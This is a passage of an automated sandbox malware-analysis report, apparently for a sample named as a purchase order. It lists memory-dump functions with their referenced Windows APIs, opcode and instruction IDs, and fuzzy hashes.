                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 41ef620ece961b5708a1807e2a1037b8c7a74adb04bfd3eb532b0905d79809c5
                                                  • Instruction ID: 73f638bec529b188a3cf06380c7b304c2977be4a3f86696f7d2e92e7bcdceaf7
                                                  • Opcode Fuzzy Hash: 41ef620ece961b5708a1807e2a1037b8c7a74adb04bfd3eb532b0905d79809c5
                                                  • Instruction Fuzzy Hash: 1FC1F33890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7DF8 Relevance: 3.2, APIs: 2, Instructions: 228COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 8422718609a28ccc9e290159a9bcce966141579af57211635fb92934f0f776cd
                                                  • Instruction ID: 993f498bfbbeaca0cde2d1497d6af97d779521a6d4f096be6a0fddbfd8aa1363
                                                  • Opcode Fuzzy Hash: 8422718609a28ccc9e290159a9bcce966141579af57211635fb92934f0f776cd
                                                  • Instruction Fuzzy Hash: 29C1033890526CCFCB65EF60D888699BBB2FF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7E3D Relevance: 3.2, APIs: 2, Instructions: 221COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 3ab54784dbb80f6811f12cf4dfc7f1afc2e7fa3f987cccf28f73d6665d79e2ff
                                                  • Instruction ID: a57b898341597369312ac1a6a20339682b7647fd83169513e6b6b7bafb542daf
                                                  • Opcode Fuzzy Hash: 3ab54784dbb80f6811f12cf4dfc7f1afc2e7fa3f987cccf28f73d6665d79e2ff
                                                  • Instruction Fuzzy Hash: 71B1033890526CCFCB65EF60D888699BBB2BF49306F6041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7E82 Relevance: 3.2, APIs: 2, Instructions: 214COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: f188a6331279ca91461dc2b4baca4c6fde44b3d709e0d7f0dc942cc78a9c0f5d
                                                  • Instruction ID: bb05b912b95844b86c6220d5b032dafe6147ae167c6887c0d99244799abd1c8e
                                                  • Opcode Fuzzy Hash: f188a6331279ca91461dc2b4baca4c6fde44b3d709e0d7f0dc942cc78a9c0f5d
                                                  • Instruction Fuzzy Hash: 62B1133890526CCFCB65EF70D888699BBB2BF49306F6041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7EC7 Relevance: 3.2, APIs: 2, Instructions: 207COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 4fc3a511e765764aefc5705998d635e7deb25d59ab503deccde11b21e11c684a
                                                  • Instruction ID: 35067ccdd36bdf52cdc08b0f51221bbe9e830c36482c0b28f3d68870579739a2
                                                  • Opcode Fuzzy Hash: 4fc3a511e765764aefc5705998d635e7deb25d59ab503deccde11b21e11c684a
                                                  • Instruction Fuzzy Hash: 4FB1123890526CCFCB61EF70D888699BBB2BF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7F0C Relevance: 3.2, APIs: 2, Instructions: 200COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF7F30
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: afef5fedb70c76ec4b770e73b421b69950b219b9e927419b3641dcf366d9d98d
                                                  • Instruction ID: 61d0346df6600d4ecd9ffb61bc02254b3395983b9cdc8f12bb7076c2e4e34074
                                                  • Opcode Fuzzy Hash: afef5fedb70c76ec4b770e73b421b69950b219b9e927419b3641dcf366d9d98d
                                                  • Instruction Fuzzy Hash: 3BA1123890526CCFCB61EF74D888699BBB2BF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7F51 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 5579054a9e11093663c4b87d86f89547130e236ab47e6c372802847d91a71968
                                                  • Instruction ID: e5aa3c669d3286aee159926dc2a6cc6adf908714b37ed54ffdcc10d8e9527ea4
                                                  • Opcode Fuzzy Hash: 5579054a9e11093663c4b87d86f89547130e236ab47e6c372802847d91a71968
                                                  • Instruction Fuzzy Hash: 5BA1133890526CCFCB61EF70D888699BBB2BF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7F99 Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 682bf5c09a37d0f3c522ef7437002da926042cfd515a937ef882933d52b571e6
                                                  • Instruction ID: db574a5c13c9e2928db4d9cb166478453a6bf6ac1d8f458a9268dc1faa4a706a
                                                  • Opcode Fuzzy Hash: 682bf5c09a37d0f3c522ef7437002da926042cfd515a937ef882933d52b571e6
                                                  • Instruction Fuzzy Hash: 2491233890526CCFCB61EF70D888699BBB2BF49306F6041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF7FD5 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 4d9cd09a3bfb81b9497aa32c1e7783766dc3106b942756f113dd5ad76efc821f
                                                  • Instruction ID: 646cd6bc572867690cb3ffea0b159d5ba49a99ffa529a257cc1bb2c0168d1382
                                                  • Opcode Fuzzy Hash: 4d9cd09a3bfb81b9497aa32c1e7783766dc3106b942756f113dd5ad76efc821f
                                                  • Instruction Fuzzy Hash: 3891133890526CCFCB65EF70D888699BBB2BF49306F5041E9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF8011 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: e71c09e342a04686673f9fed632a14c2471a879090119c82c5a01c936a921188
                                                  • Instruction ID: 7c907ee1ce1d5cae8113f2eef6ee413488a9afd771017620da2281819cb60e6c
                                                  • Opcode Fuzzy Hash: e71c09e342a04686673f9fed632a14c2471a879090119c82c5a01c936a921188
                                                  • Instruction Fuzzy Hash: 8591233890526CCFCB61EF70D888699BBB2BF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF8059 Relevance: 1.7, APIs: 1, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 2e12b108718460bd614e284fd1c28ab75d2f2f69cb2824cb2cd6e7e2e2d862c4
                                                  • Instruction ID: 67aff323c2a6fdc8a609153905874c62cb35f90decec53d56e666585577ae9e5
                                                  • Opcode Fuzzy Hash: 2e12b108718460bd614e284fd1c28ab75d2f2f69cb2824cb2cd6e7e2e2d862c4
                                                  • Instruction Fuzzy Hash: 1481233890526CCFCB61EF70D888699BBB2BF49306F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF80A1 Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 58349880808885e567f326d515c4de9e57044da22ad3ae1fdf3ab6730e0f6ef3
                                                  • Instruction ID: 7aad461470463512acb219825d6ac81a66a01775be5b9758447864850373e803
                                                  • Opcode Fuzzy Hash: 58349880808885e567f326d515c4de9e57044da22ad3ae1fdf3ab6730e0f6ef3
                                                  • Instruction Fuzzy Hash: AD81133890526CCFCB61EF60D888699BBB2BF49306F5041E9E50AA7340CB356E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF80E9 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: ea414f76b0abbe25c26b8514594378776b0b14b76825c65484e7288d39eede7b
                                                  • Instruction ID: 2086cd2a813251e00e6157225f9806767ede1d775c50c8f1d114817372b84502
                                                  • Opcode Fuzzy Hash: ea414f76b0abbe25c26b8514594378776b0b14b76825c65484e7288d39eede7b
                                                  • Instruction Fuzzy Hash: A471123890526CCFCB60EF64D888699BBB2BF49305F5041E9E50AA7340CB35AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF8131 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 419ddba418130667bbbf38e6e5d62a25884a493fcfb364f8bd688449ae489758
                                                  • Instruction ID: d4f3111dac94ebfa41d5aa687e22a16b1ac4f49dfdf7beb2736141a17ec9b378
                                                  • Opcode Fuzzy Hash: 419ddba418130667bbbf38e6e5d62a25884a493fcfb364f8bd688449ae489758
                                                  • Instruction Fuzzy Hash: 4E71123890522CCFCB60EF64D98C699BBB2BF49306F5041E9E50AA7340CB35AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF8179 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 9f3ccc34749ce6ea659915ad9099a6bf02569b6fd1c7cea9f051f8614069cc64
                                                  • Instruction ID: dc6dc69902270691794cad926451e24ce113edf8015752f6463cf3d81dee46ee
                                                  • Opcode Fuzzy Hash: 9f3ccc34749ce6ea659915ad9099a6bf02569b6fd1c7cea9f051f8614069cc64
                                                  • Instruction Fuzzy Hash: 2261023890522CCFCB65EF64D888699BBB2BF49305F5041D9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF81C1 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: fcbe2d525a901f77fd2d07a3d5c299bf8b83fabfd3e4a62467e8f2538426671b
                                                  • Instruction ID: 53a13478791fdde11e07ad264c54788a8cdee06c9e1459bac898aa665807e2e5
                                                  • Opcode Fuzzy Hash: fcbe2d525a901f77fd2d07a3d5c299bf8b83fabfd3e4a62467e8f2538426671b
                                                  • Instruction Fuzzy Hash: 6D610438A0522CCFCB65EF74D888699BBB2BF4A305F5041D9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF8209 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: b1eaaa0d4dc41eb38e530e3e8726784318c83fcd8b10a3edcab42e5f5011faad
                                                  • Instruction ID: 1ef1b539209ed65c52f86b4563f1b35433cfc734d37d26b0fe4c02f62efef317
                                                  • Opcode Fuzzy Hash: b1eaaa0d4dc41eb38e530e3e8726784318c83fcd8b10a3edcab42e5f5011faad
                                                  • Instruction Fuzzy Hash: 60511238A0522CCFCB65EF74D888699BBB2BF49305F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 064B8020 Relevance: 1.6, APIs: 1, Instructions: 122registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 064B8139
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.522575387.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_64b0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  • Opcode ID: b39dca040fd3e4d25cac76ad5165582268335e8cde57b8593b68b04325eb9cdc
                                                  • Instruction ID: 4b9042981997ed7adeb6a5a377e49f4dcaa4f126ca4f1274e35b60e47a4e723a
                                                  • Opcode Fuzzy Hash: b39dca040fd3e4d25cac76ad5165582268335e8cde57b8593b68b04325eb9cdc
                                                  • Instruction Fuzzy Hash: 514147B1E053989FCB11CFA9C984ACEBFF5AF49304F19846AE858AB341D7349945CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF8251 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 1012e55f7181d7a5a231755c24e9bbd75594eb94b3e22a97ed6d0995813438c2
                                                  • Instruction ID: 32b5911ebf1cc70f146adeda9ee54bc0e62c8b866d68b75b7c9255c00f67f7b5
                                                  • Opcode Fuzzy Hash: 1012e55f7181d7a5a231755c24e9bbd75594eb94b3e22a97ed6d0995813438c2
                                                  • Instruction Fuzzy Hash: 91511438A0522CCFCB64EF64D988699BBB2BF49305F5041D9E50AA7340CB716E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 064B7D68 Relevance: 1.6, APIs: 1, Instructions: 113registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 064B7E7C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.522575387.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_64b0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 2638845749cf4ffcb94e132c015c02386a3bb51c95f7262e03a546095d9fdfc8
                                                  • Instruction ID: 49c11b1748e36834feae4a946f6bc9b65d2852a9ababb46cbc6347e4de91bcad
                                                  • Opcode Fuzzy Hash: 2638845749cf4ffcb94e132c015c02386a3bb51c95f7262e03a546095d9fdfc8
                                                  • Instruction Fuzzy Hash: CC414970D093898FDB01CFA9C548A8EFFF5BF89304F29856AD509AB341C7749845CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF828D Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 723188afb7ccead734d5067ab88a1a5cc7692bdc5a3cbb22545a57255beba4e6
                                                  • Instruction ID: 3f5c63ccad7f3816b5562e15db5b9e79a7203c864317caf1dc523cf93312524c
                                                  • Opcode Fuzzy Hash: 723188afb7ccead734d5067ab88a1a5cc7692bdc5a3cbb22545a57255beba4e6
                                                  • Instruction Fuzzy Hash: C7511538A0522CCFCB65EF64D88C699BBB2BF49305F5041D9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF82C9 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 7b4c42b8c61ebbd580c7175d8eec80d885562b3ce114a702a500cdd02581b258
                                                  • Instruction ID: eee093d1e8f3b57ee8659ff8a89856e7b94311bef89eb43d5e353059a17c5f0c
                                                  • Opcode Fuzzy Hash: 7b4c42b8c61ebbd580c7175d8eec80d885562b3ce114a702a500cdd02581b258
                                                  • Instruction Fuzzy Hash: 28510738A0622CCFCB65EF64D888699BBB2FF45305F5041D9E50AA7340CB756E95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF8311 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 9db18776d7937a6f290ca749ecb3bc1b3de839dbf1d3368f4c32f550cd14ba7e
                                                  • Instruction ID: 7ffcaf9eea8d4883c6961f434b4df729146e6256da814393eece5522c3158a32
                                                  • Opcode Fuzzy Hash: 9db18776d7937a6f290ca749ecb3bc1b3de839dbf1d3368f4c32f550cd14ba7e
                                                  • Instruction Fuzzy Hash: 2E410338A0622CCFCB60EF64D888699BBB2BF45305F5041E9E50AA7340CF75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00FCC8E4 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?), ref: 00FCC9BA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515488004.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_fc0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: e7e7c47aec35be3da33f7afeb415affc89baa39e30d463375f7be374b9d90b9a
                                                  • Instruction ID: 584e7e1628c5d253a106080281097f564e30dd03725f149b304b1d1ee8c7d17b
                                                  • Opcode Fuzzy Hash: e7e7c47aec35be3da33f7afeb415affc89baa39e30d463375f7be374b9d90b9a
                                                  • Instruction Fuzzy Hash: 2C3128B1D0024A9FCB14CFA9C586B9EBFF1BB08314F14852DE819A7780D7749885CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00FC9DC0 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNELBASE(?), ref: 00FCC9BA
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.515488004.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_fc0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: b9bb0a891426b44c5e867f34c3ca466d955761529a9ac6e41a30ae729d76af55
                                                  • Instruction ID: 9c2d7231ac448766fbef65a474694a7543bee2578e08d89485de10f284ae63a3
                                                  • Opcode Fuzzy Hash: b9bb0a891426b44c5e867f34c3ca466d955761529a9ac6e41a30ae729d76af55
                                                  • Instruction Fuzzy Hash: A53127B1D0424A9FCB14CFA9C546B9EBFF1BB08314F14852DE81AA7780D7789885CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05BF8359 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 05BF8404
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.521621722.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_5bf0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 031f1b2b336ee44ef0df7cfc480db0318c5d5a57182986d6aa7e4d6dfb3d53aa
                                                  • Instruction ID: 762ac24735dd406431c0a50a009ece2f51a52690a1c93b6932b02c8e35f5b9ba
                                                  • Opcode Fuzzy Hash: 031f1b2b336ee44ef0df7cfc480db0318c5d5a57182986d6aa7e4d6dfb3d53aa
                                                  • Instruction Fuzzy Hash: 64411438A0622CCFCB60EF64D989699BBB2FF45305F5041E9E50AA7340CB75AE95CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 064B6820 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 064B8139
                                                  Memory Dump Source
